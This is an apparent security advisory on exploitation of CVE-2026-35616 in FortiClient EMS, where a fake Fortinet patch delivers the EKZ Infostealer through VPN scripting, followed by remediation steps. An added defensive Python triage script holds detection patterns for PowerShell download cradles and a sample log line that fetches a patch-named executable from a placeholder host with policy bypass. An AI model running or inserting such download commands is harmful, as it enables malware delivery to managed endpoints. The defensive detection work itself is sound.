FortiClient EMS: EKZ Infostealer May Target VPN Management Channels

On May 28, 2026, reports documented a wave of attacks potentially exploiting CVE-2026-35616, a critical improper access control vulnerability in FortiClient EMS versions 7.4.5-7.4.6 with a CVSS score of up to 9.8. These exploits could potentially evolve beyond appliance compromise: they may transform the distributed management infrastructure into a delivery channel for EKZ Infostealer, potentially abusing native VPN scripting workflows to infect managed endpoints.

The vulnerability has been a reported threat since April. While Fortinet released hotfixes following reports of zero-day exploitation, and CISA added the CVE to its Known Exploited Vulnerabilities (KEV) catalog on April 6, 2026, attacks may have persisted through May. This ongoing campaign could expose an operational challenge: the platform built to secure the VPN perimeter may become a vehicle for compromise.

Key Takeaways
  • CVE-2026-35616 is an improper access control vulnerability (CWE-284) in FortiClient EMS 7.4.5-7.4.6, carrying a CVSS score of 9.8 (Fortinet CNA) or 9.1 (CVE.org with temporal metrics E:F/RL:O/RC:C).
  • May 2026 attacks may distribute EKZ Infostealer disguised as a Fortinet endpoint patch, potentially executed via PowerShell through EMS-managed VPN scripting workflows.
  • EKZ Infostealer may export credentials from supported browsers to local log files. It may lack network-based exfiltration capabilities, so stolen data could remain on the host for manual collection or retrieval through secondary channels.
  • Compromising the EMS appliance could enable code execution on managed endpoints, potentially turning a single entry point into a distribution vector through native management features.

Exploit Mechanics: Potential Auth Bypass and Command Execution

The flaw resides in the processing of crafted HTTP requests sent to specific FortiClient EMS endpoints. The appliance may accept these requests as legitimate administrative actions even without valid credentials, potentially bypassing access controls. Once inside, attackers could interact with features that normally require administrative privileges.

The May 2026 campaign is characterized by its potential secondary phase. Attackers may have integrated the management infrastructure into the offensive chain. They could use VPN scripting workflows, native features designed to automate operations on VPN clients, to push PowerShell commands to endpoints. Reports noted that the execution pattern could resemble legitimate management operations, potentially neutralizing behavioral detection by riding a trusted channel.

"The observed execution pattern suggests that threat actors used FortiClient's own management pathway to push malicious PowerShell commands to managed endpoints in a way that resembled legitimate management operations" — Arctic Wolf

The infostealer may be presented as a fake Fortinet endpoint update and executed via PowerShell. Once active, EKZ could harvest credentials from supported browsers and write them to local log files. The potential omission of network-based exfiltration suggests a modular design: the malware may focus on collection, potentially delegating data removal to subsequent stages or separate tools.

From March Zero-Day to Continuous Exploitation

Initial exploitation attempts were observed as early as March 31, 2026, as documented in reports dated April 6. Fortinet responded with hotfixes, and CISA included the CVE in the KEV catalog. During the same period, researchers identified nearly 2,000 FortiClient EMS instances potentially exposed to the public internet.

The surge in exploitation coincided with the Easter holiday weekend. Reports noted that attackers frequently time operations for holiday weekends. The operational advice was that applying the hotfix should be treated as a priority.

Findings suggest that the May 2026 attacks may reuse the same vulnerability, the same attack surface, and the same vulnerable endpoints. The underlying issue appears to be failure to apply the available patches.

Management Risks: When Security Platforms Are Targeted

The CVE-2026-35616 case illustrates a pattern where trusted control and distribution infrastructure could be weaponized. While the abuse of endpoint management tools is not unprecedented, the convergence of several factors makes this case significant.

First, the unauthenticated nature of the vulnerability could lower the barrier to entry. Second, the potential abuse of VPN scripting workflows exploits a channel that is typically excluded from behavioral monitoring. Third, masking the payload as a patch could exploit the trust endpoints place in their management system.

The operational impact could extend beyond a single compromised endpoint. Access to the EMS appliance could provide access to the managed fleet. In organizations with many VPN endpoints, compromising the central EMS could represent an enterprise-level escalation, potentially bypassing intermediate lateral movement phases.

Remediation and Response

  • Verify the production version of FortiClient EMS: Vulnerable builds 7.4.5 and 7.4.6 should be updated to the hotfix released by Fortinet.
  • Inspect active VPN scripting workflows on managed clients: Unauthorized scripts or anomalous PowerShell invocations through this channel could be indicators of compromise.
  • Audit for EKZ Infostealer by searching managed endpoints for local log files that may contain exported browser credentials.
  • Assess the public exposure of the EMS appliance: Organizations should ensure the vulnerable endpoint is not accessible to the open internet.
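To make the first two remediation items actionable, here is an added triage script that is not from the article, from Fortinet, or from Arctic Wolf. The vulnerable version range comes from the text above; the PowerShell heuristics, the placeholder URL and the sample command lines are constructed for illustration and are not indicators from the campaign.

```python
import re

# Vulnerable builds named in the article; anything else is out of scope here.
VULNERABLE_EMS_VERSIONS = {(7, 4, 5), (7, 4, 6)}

def parse_version(version: str) -> tuple:
    """Reduce '7.4.6' or '7.4.6 build 2000' to a comparable (major, minor, patch)."""
    m = re.match(r"^\s*v?(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised EMS version string: {version!r}")
    return tuple(int(x) for x in m.groups())

def ems_is_vulnerable(version: str) -> bool:
    """True only for the 7.4.5 / 7.4.6 builds the advisory names."""
    return parse_version(version) in VULNERABLE_EMS_VERSIONS

# Traits a PowerShell command pushed through a VPN scripting workflow should not
# normally carry: download cradles, encoded payloads, policy bypass, IEX.
SUSPICIOUS = {
    "download cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b", re.I),
    "encoded command": re.compile(r"-enc(odedcommand)?\b", re.I),
    "execution policy bypass": re.compile(r"-executionpolicy\s+bypass", re.I),
    "invoke-expression": re.compile(r"invoke-expression|\biex\b", re.I),
}

def score_powershell_line(cmdline: str) -> list:
    """Return the suspicious traits found in one logged command line."""
    hits = [name for name, pat in SUSPICIOUS.items() if pat.search(cmdline)]
    # A cradle fetching something named like a Fortinet patch matches the lure
    # the article describes, so call it out explicitly (heuristic, not an IoC).
    if hits and re.search(r"forti\w*[_-]?(patch|update)", cmdline, re.I):
        hits.append("patch-themed lure")
    return hits

def triage(log_lines) -> list:
    """Keep only lines with at least one hit, paired with their hit list."""
    findings = []
    for line in log_lines:
        hits = score_powershell_line(line)
        if hits:
            findings.append((line, hits))
    return findings

# Constructed sample command lines (not real indicators; the URL is a placeholder).
SAMPLE_LOG = [
    'powershell.exe -NoProfile -Command "Get-Service FortiClient* | Select-Object Status"',
    'powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Invoke-WebRequest '
    'http://placeholder.invalid/FortiClient_Patch.exe -OutFile $env:TEMP\\FortiClient_Patch.exe"',
    'powershell.exe -NoProfile -EncodedCommand UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA=',  # benign "Start-Sleep 1"
]
```

The encoded sample is harmless by design: the heuristic flags the encoding itself, so treat hits as triage leads to be reviewed against the workflows you actually deployed, not as verdicts.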

The Lesson of the Patching Gap

CISA assigned CVE-2026-35616 a short due date in the KEV catalog. This urgency reflected the severity: potential unauthenticated remote access, RCE, and confirmed exploitation. Yet, the May 2026 campaign demonstrates that even high-priority signals may not guarantee immediate operational action.

The gap between patch availability and deployment remains a significant challenge in enterprise defense. This may be a problem of operational friction and change management in environments where EMS handles critical remote access, potentially leading to risk assessments that favor uptime.

It remains unconfirmed whether the May 2026 attacks are attributable to the same threat actor responsible for the initial wave. Furthermore, it is unknown if CVE-2026-35616 and CVE-2026-21643—another FortiClient EMS vulnerability in the KEV involving SQL injection—were exploited in linked campaigns. Sources also do not specify if version 7.4.7, containing the permanent fix, has been officially released.

The next wave of attacks may find the same vulnerabilities still present.

Information has been verified against cited sources and is current as of the time of publication.